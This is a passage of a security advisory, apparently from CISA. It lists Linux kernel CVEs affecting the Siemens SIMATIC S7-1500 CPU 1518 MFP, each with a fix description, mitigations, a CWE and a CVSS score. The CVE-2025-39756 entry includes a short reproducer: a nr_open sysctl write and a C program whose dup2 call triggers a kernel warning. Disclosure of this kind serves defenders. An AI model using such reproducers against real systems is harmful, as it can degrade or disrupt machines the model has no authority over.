__sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1113 asm_call_irq_on_stack arch/x86/entry/entry_64.S:808 netlink_attachskb net/netlink/af_netlink.c:1234 netlink_unicast net/netlink/af_netlink.c:1349 kauditd_send_queue kernel/audit.c:776 kauditd_thread kernel/audit.c:897 kthread kernel/kthread.c:328 ret_from_fork arch/x86/entry/entry_64.S:304 Restore the original behavior of the check which commit in Fixes accidentally missed when restructuring the code. Found by Linux Verification Center (linuxtesting.org).</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-38727">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/835.html">CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-38732</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_reject: don't leak dst refcount for loopback packets recent patches to add a WARN() when replacing skb dst entry found an old bug: WARNING: include/linux/skbuff.h:1165 skb_dst_check_unset include/linux/skbuff.h:1164 [inline] WARNING: include/linux/skbuff.h:1165 skb_dst_set include/linux/skbuff.h:1210 [inline] WARNING: include/linux/skbuff.h:1165 nf_reject_fill_skb_dst+0x2a4/0x330 net/ipv4/netfilter/nf_reject_ipv4.c:234 [..] Call Trace: nf_send_unreach+0x17b/0x6e0 net/ipv4/netfilter/nf_reject_ipv4.c:325 nft_reject_inet_eval+0x4bc/0x690 net/netfilter/nft_reject_inet.c:27 expr_call_ops_eval net/netfilter/nf_tables_core.c:237 [inline] .. This is because blamed commit forgot about loopback packets. Such packets already have a dst_entry attached, even at PRE_ROUTING stage. Instead of checking hook just check if the skb already has a route attached to it.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-38732">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/911.html">CWE-911 Improper Update of Reference Count</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.8</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-38736</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: usb: asix_devices: Fix PHY address mask in MDIO bus initialization Syzbot reported shift-out-of-bounds exception on MDIO bus initialization. The PHY address should be masked to 5 bits (0-31). Without this mask, invalid PHY addresses could be used, potentially causing issues with MDIO bus operations. Fix this by masking the PHY address with 0x1f (31 decimal) to ensure it stays within the valid range.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-38736">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39681</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: x86/cpu/hygon: Add missing resctrl_cpu_detect() in bsp_init helper Since 923f3a2b48bd ("x86/resctrl: Query LLC monitoring properties once during boot") resctrl_cpu_detect() has been moved from common CPU initialization code to the vendor-specific BSP init helper, while Hygon didn't put that call in their code. This triggers a division by zero fault during early booting stage on our machines with X86_FEATURE_CQM* supported, where get_rdt_mon_resources() tries to calculate mon_l3_config with uninitialized boot_cpu_data.x86_cache_occ_scale. Add the missing resctrl_cpu_detect() in the Hygon BSP init helper. [ bp: Massage commit message. ]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39681">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/369.html">CWE-369 Divide By Zero</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39691</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: fs/buffer: fix use-after-free when call bh_read() helper There's issue as follows: BUG: KASAN: stack-out-of-bounds in end_buffer_read_sync+0xe3/0x110 Read of size 8 at addr ffffc9000168f7f8 by task swapper/3/0 CPU: 3 UID: 0 PID: 0 Comm: swapper/3 Not tainted 6.16.0-862.14.0.6.x86_64 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996) Call Trace: dump_stack_lvl+0x55/0x70 print_address_description.constprop.0+0x2c/0x390 print_report+0xb4/0x270 kasan_report+0xb8/0xf0 end_buffer_read_sync+0xe3/0x110 end_bio_bh_io_sync+0x56/0x80 blk_update_request+0x30a/0x720 scsi_end_request+0x51/0x2b0 scsi_io_completion+0xe3/0x480 ? scsi_device_unbusy+0x11e/0x160 blk_complete_reqs+0x7b/0x90 handle_softirqs+0xef/0x370 irq_exit_rcu+0xa5/0xd0 sysvec_apic_timer_interrupt+0x6e/0x90 Above issue happens when do ntfs3 filesystem mount, issue may happens as follows: mount IRQ ntfs_fill_super read_cache_page do_read_cache_folio filemap_read_folio mpage_read_folio do_mpage_readpage ntfs_get_block_vbo bh_read submit_bh wait_on_buffer(bh); blk_complete_reqs scsi_io_completion scsi_end_request blk_update_request end_bio_bh_io_sync end_buffer_read_sync __end_buffer_read_notouch unlock_buffer wait_on_buffer(bh);--&gt; return will return to caller put_bh --&gt; trigger stack-out-of-bounds In the mpage_read_folio() function, the stack variable 'map_bh' is passed to ntfs_get_block_vbo(). Once unlock_buffer() unlocks and wait_on_buffer() returns to continue processing, the stack variable is likely to be reclaimed. Consequently, during the end_buffer_read_sync() process, calling put_bh() may result in stack overrun. If the bh is not allocated on the stack, it belongs to a folio. Freeing a buffer head which belongs to a folio is done by drop_buffers() which will fail to free buffers which are still locked. So it is safe to call put_bh() before __end_buffer_read_notouch().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39691">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.4</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39721</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: crypto: qat - flush misc workqueue during device shutdown Repeated loading and unloading of a device specific QAT driver, for example qat_4xxx, in a tight loop can lead to a crash due to a use-after-free scenario. This occurs when a power management (PM) interrupt triggers just before the device-specific driver (e.g., qat_4xxx.ko) is unloaded, while the core driver (intel_qat.ko) remains loaded. Since the driver uses a shared workqueue (`qat_misc_wq`) across all devices and owned by intel_qat.ko, a deferred routine from the device-specific driver may still be pending in the queue. If this routine executes after the driver is unloaded, it can dereference freed memory, resulting in a page fault and kernel crash like the following: BUG: unable to handle page fault for address: ffa000002e50a01c #PF: supervisor read access in kernel mode RIP: 0010:pm_bh_handler+0x1d2/0x250 [intel_qat] Call Trace: pm_bh_handler+0x1d2/0x250 [intel_qat] process_one_work+0x171/0x340 worker_thread+0x277/0x3a0 kthread+0xf0/0x120 ret_from_fork+0x2d/0x50 To prevent this, flush the misc workqueue during device shutdown to ensure that all pending work items are completed before the driver is unloaded. Note: This approach may slightly increase shutdown latency if the workqueue contains jobs from other devices, but it ensures correctness and stability.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39721">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.1</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39748</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: bpf: Forget ranges when refining tnum after JSET Syzbot reported a kernel warning due to a range invariant violation on the following BPF program. 0: call bpf_get_netns_cookie 1: if r0 == 0 goto 2: if r0 &amp; Oxffffffff goto The issue is on the path where we fall through both jumps. That path is unreachable at runtime: after insn 1, we know r0 != 0, but with the sign extension on the jset, we would only fallthrough insn 2 if r0 == 0. Unfortunately, is_branch_taken() isn't currently able to figure this out, so the verifier walks all branches. The verifier then refines the register bounds using the second condition and we end up with inconsistent bounds on this unreachable path: 1: if r0 == 0 goto r0: u64=[0x1, 0xffffffffffffffff] var_off=(0, 0xffffffffffffffff) 2: if r0 &amp; 0xffffffff goto r0 before reg_bounds_sync: u64=[0x1, 0xffffffffffffffff] var_off=(0, 0) r0 after reg_bounds_sync: u64=[0x1, 0] var_off=(0, 0) Improving the range refinement for JSET to cover all cases is tricky. We also don't expect many users to rely on JSET given LLVM doesn't generate those instructions. So instead of improving the range refinement for JSETs, Eduard suggested we forget the ranges whenever we're narrowing tnums after a JSET. This patch implements that approach.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39748">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/478.html">CWE-478 Missing Default Case in Multiple Condition Expression</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39756</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: fs: Prevent file descriptor table allocations exceeding INT_MAX When sysctl_nr_open is set to a very high value (for example, 1073741816 as set by systemd), processes attempting to use file descriptors near the limit can trigger massive memory allocation attempts that exceed INT_MAX, resulting in a WARNING in mm/slub.c: WARNING: CPU: 0 PID: 44 at mm/slub.c:5027 __kvmalloc_node_noprof+0x21a/0x288 This happens because kvmalloc_array() and kvmalloc() check if the requested size exceeds INT_MAX and emit a warning when the allocation is not flagged with __GFP_NOWARN. Specifically, when nr_open is set to 1073741816 (0x3ffffff8) and a process calls dup2(oldfd, 1073741880), the kernel attempts to allocate: - File descriptor array: 1073741880 * 8 bytes = 8,589,935,040 bytes - Multiple bitmaps: ~400MB - Total allocation size: &gt; 8GB (exceeding INT_MAX = 2,147,483,647) Reproducer: 1. Set /proc/sys/fs/nr_open to 1073741816: # echo 1073741816 &gt; /proc/sys/fs/nr_open 2. Run a program that uses a high file descriptor: #include #include int main() { struct rlimit rlim = {1073741824, 1073741824}; setrlimit(RLIMIT_NOFILE, &amp;rlim); dup2(2, 1073741880); // Triggers the warning return 0; } 3. Observe WARNING in dmesg at mm/slub.c:5027 systemd commit a8b627a introduced automatic bumping of fs.nr_open to the maximum possible value. The rationale was that systems with memory control groups (memcg) no longer need separate file descriptor limits since memory is properly accounted. However, this change overlooked that: 1. The kernel's allocation functions still enforce INT_MAX as a maximum size regardless of memcg accounting 2. Programs and tests that legitimately test file descriptor limits can inadvertently trigger massive allocations 3. The resulting allocations (&gt;8GB) are impractical and will always fail systemd's algorithm starts with INT_MAX and keeps halving the value until the kernel accepts it. On most systems, this results in nr_open being set to 1073741816 (0x3ffffff8), which is just under 1GB of file descriptors. While processes rarely use file descriptors near this limit in normal operation, certain selftests (like tools/testing/selftests/core/unshare_test.c) and programs that test file descriptor limits can trigger this issue. Fix this by adding a check in alloc_fdtable() to ensure the requested allocation size does not exceed INT_MAX. This causes the operation to fail with -EMFILE instead of triggering a kernel warning and avoids the impractical &gt;8GB memory allocation request.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39756">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/401.html">CWE-401 Missing Release of Memory after Effective Lifetime</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39764</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: ctnetlink: remove refcounting in expectation dumpers Same pattern as previous patch: do not keep the expectation object alive via refcount, only store a cookie value and then use that as the skip hint for dump resumption. AFAICS this has the same issue as the one resolved in the conntrack dumper, when we do if (!refcount_inc_not_zero(&amp;exp-&gt;use)) to increment the refcount, there is a chance that exp == last, which causes a double-increment of the refcount and subsequent memory leak.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39764">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/911.html">CWE-911 Improper Update of Reference Count</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
